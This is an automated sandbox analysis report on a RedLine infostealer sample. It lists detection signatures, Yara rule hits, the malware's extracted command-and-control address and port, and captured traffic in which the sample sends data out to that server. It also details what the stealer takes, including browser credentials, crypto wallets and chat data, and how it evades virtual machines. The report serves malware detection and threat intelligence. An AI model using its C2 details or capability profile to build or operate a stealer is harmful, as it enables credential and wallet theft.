Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe

Overview

General Information

Sample name:a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
Analysis ID:1464083
MD5:6bd0efca19c8a21373008dd422aaf39b
SHA1:c81af8840eccf6a7b5354046ace6e1a4a77b487f
SHA256:6d62a0958a7574ba2ad7dce6199bbd1520afd23fea2183dc031b234e5fc66698
Tags:exe
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
SourceRuleDescriptionAuthorStrings
a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWindows_Trojan_RedLineStealer_f54632ebunknownunknown
      • 0x135ca:$a4: get_ScannedWallets
      • 0x12428:$a5: get_ScanTelegram
      • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
      • 0x1106a:$a7: <Processes>k__BackingField
      • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x1099e:$a9: <ScanFTP>k__BackingField
      a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1048a:$u7: RunPE
      • 0x13b41:$u8: DownloadAndEx
      • 0x9130:$pat14: , CommandLine:
      • 0x13079:$v2_1: ListOfProcesses
      • 0x1068b:$v2_2: get_ScanVPN
      • 0x1072e:$v2_2: get_ScanFTP
      • 0x1141e:$v2_2: get_ScanDiscord
      • 0x1240c:$v2_2: get_ScanSteam
      • 0x12428:$v2_2: get_ScanTelegram
      • 0x124ce:$v2_2: get_ScanScreen
      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
      • 0x13509:$v2_2: get_ScanBrowsers
      • 0x135ca:$v2_2: get_ScannedWallets
      • 0x135f0:$v2_2: get_ScanWallets
      • 0x13610:$v2_3: GetArguments
      • 0x11cd9:$v2_4: VerifyUpdate
      • 0x165ee:$v2_4: VerifyUpdate
      • 0x139ca:$v2_5: VerifyScanRequest
      • 0x130c6:$v2_6: GetUpdates
      • 0x165cf:$v2_6: GetUpdates
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
        dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
              • 0x133ca:$a4: get_ScannedWallets
              • 0x12228:$a5: get_ScanTelegram
              • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
              • 0x10e6a:$a7: <Processes>k__BackingField
              • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
              • 0x1079e:$a9: <ScanFTP>k__BackingField
              00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Process Memory Space: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe PID: 5052JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 2 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                      • 0x135ca:$a4: get_ScannedWallets
                      • 0x12428:$a5: get_ScanTelegram
                      • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                      • 0x1106a:$a7: <Processes>k__BackingField
                      • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                      • 0x1099e:$a9: <ScanFTP>k__BackingField
                      0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1048a:$u7: RunPE
                      • 0x13b41:$u8: DownloadAndEx
                      • 0x9130:$pat14: , CommandLine:
                      • 0x13079:$v2_1: ListOfProcesses
                      • 0x1068b:$v2_2: get_ScanVPN
                      • 0x1072e:$v2_2: get_ScanFTP
                      • 0x1141e:$v2_2: get_ScanDiscord
                      • 0x1240c:$v2_2: get_ScanSteam
                      • 0x12428:$v2_2: get_ScanTelegram
                      • 0x124ce:$v2_2: get_ScanScreen
                      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                      • 0x13509:$v2_2: get_ScanBrowsers
                      • 0x135ca:$v2_2: get_ScannedWallets
                      • 0x135f0:$v2_2: get_ScanWallets
                      • 0x13610:$v2_3: GetArguments
                      • 0x11cd9:$v2_4: VerifyUpdate
                      • 0x165ee:$v2_4: VerifyUpdate
                      • 0x139ca:$v2_5: VerifyScanRequest
                      • 0x130c6:$v2_6: GetUpdates
                      • 0x165cf:$v2_6: GetUpdates
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeAvira: detected
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeMalware Configuration Extractor: RedLine {"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
                      Source: http://185.38.142.10:7474Virustotal: Detection: 11%Perma Link
                      Source: http://185.38.142.10:7474/Virustotal: Detection: 11%Perma Link
                      Source: http://185.38.142.10Virustotal: Detection: 11%Perma Link
                      Source: 185.38.142.10:7474Virustotal: Detection: 11%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeJoe Sandbox ML: detected
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: 185.38.142.10:7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                      Source: global trafficTCP traffic: 192.168.2.4:49731 -> 185.38.142.10:7474
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.38.142.10:7474Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.38.142.10:7474Content-Length: 956438Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.38.142.10:7474Content-Length: 956430Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: Joe Sandbox ViewIP Address: 185.38.142.10 185.38.142.10
                      Source: Joe Sandbox ViewASN Name: NETSOLUTIONSNL NETSOLUTIONSNL
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                      Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmp, a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474/
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003401000.00000004.00000800.00020000.00000000.sdmp, a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003501000.00000004.00000800.00020000.00000000.sdmp, a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeString found in binary or memory: https://ipinfo.io/ip%appdata%
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: tmp78A1.tmp.0.dr, tmp78C2.tmp.0.dr, tmp78B2.tmp.0.dr, tmp78D3.tmp.0.dr, tmp78E4.tmp.0.dr, tmpB297.tmp.0.dr, tmpB266.tmp.0.dr, tmp78E3.tmp.0.dr, tmpB298.tmp.0.dr, tmpB245.tmp.0.dr, tmpB267.tmp.0.dr, tmpB256.tmp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      System Summary

                      barindex
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, type: SAMPLEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe PID: 5052, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_0314E7B00_2_0314E7B0
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_06C296D00_2_06C296D0
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_06C237C00_2_06C237C0
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_06C245080_2_06C24508
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_06C212100_2_06C21210
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_06C2DAD00_2_06C2DAD0
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_06C2D5C80_2_06C2D5C8
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.0000000003401000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
